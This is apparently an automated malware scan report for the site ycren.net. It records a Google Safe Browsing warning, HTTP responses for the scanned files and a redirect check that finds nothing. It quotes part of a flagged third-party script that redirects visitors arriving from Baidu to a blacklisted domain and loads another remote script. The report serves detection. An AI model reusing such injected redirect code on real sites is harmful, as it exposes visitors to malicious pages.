Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ycren.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ycren.net/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 01:49:10 GMT Accept-Ranges: bytes ETag: "32a15ec8c914d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 9622 Content-Location: http://ycren.net/index.html Content-Type: text/html Last-Modified: Wed, 10 Dec 2014 22:36:47 GMT X-Powered-By: ASP.NET | clean |
http://ycren.net/index.html | 200 OK Content-Length: 9622 Content-Type: text/html | clean |
http://Js.lwtzdec.com/huishou.js | 200 OK Content-Length: 1063 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: vip.hunlianyuan.com ...[596 bytes skipped]... ) > -1) { window.opener.location.href = url } else { window.opener.location.replace(url) } } }; var referer = document.referrer; if (!referer) { return }; var rst = /https?\:\/\/([^\/]+)/i.exec(referer); var host = rst ? rst[1] : 'unknown'; if (/baidu\.com$/i.test(host) && timeallow) { var search = referer.substring(referer.indexOf('?')); jump("http://vip.hunlianyuan.com/1.html"); return } })() } catch(e) {} document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>'); | ||
http://ycren.net/sfwz/283 | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 01:49:13 GMT Accept-Ranges: bytes ETag: "8ad16d8511d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 1531 Content-Location: http://ycren.net/404.html?404;http://ycren.net:80/sfwz/283 Content-Type: text/html Last-Modified: Sat, 15 Nov 2014 18:25:23 GMT X-Powered-By: ASP.NET | clean |
http://ycren.net/404.html?404;http://ycren.net:80/sfwz/283 | 200 OK Content-Length: 1531 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://js.users.51.la/17453581.js | 200 OK Content-Length: 1930 Content-Type: application/x-javascript | clean |
http://ycren.net/test404page.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 01:49:15 GMT Accept-Ranges: bytes ETag: "8ad16d8511d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 1531 Content-Location: http://ycren.net/404.html?404;http://ycren.net:80/test404page.js Content-Type: text/html Last-Modified: Sat, 15 Nov 2014 18:25:23 GMT X-Powered-By: ASP.NET | clean |
http://ycren.net/404.html?404;http://ycren.net:80/test404page.js | 200 OK Content-Length: 1531 Content-Type: text/html | clean |
http://ycren.net/tj.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ycren.net
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 01:49:10 GMT
Accept-Ranges: bytes
ETag: "32a15ec8c914d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 9622
Content-Location: http://ycren.net/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:36:47 GMT
X-Powered-By: ASP.NET
...9622 bytes of data.
GET / HTTP/1.1
Host: ycren.net
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 01:49:10 GMT
Accept-Ranges: bytes
ETag: "32a15ec8c914d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 9622
Content-Location: http://ycren.net/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:36:47 GMT
X-Powered-By: ASP.NET
...9622 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ycren.net
Referer: http://www.google.com/search?q=ycren.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ycren.net
Referer: http://www.google.com/search?q=ycren.net
Result:
The result is similar to the first query. There are no suspicious redirects found.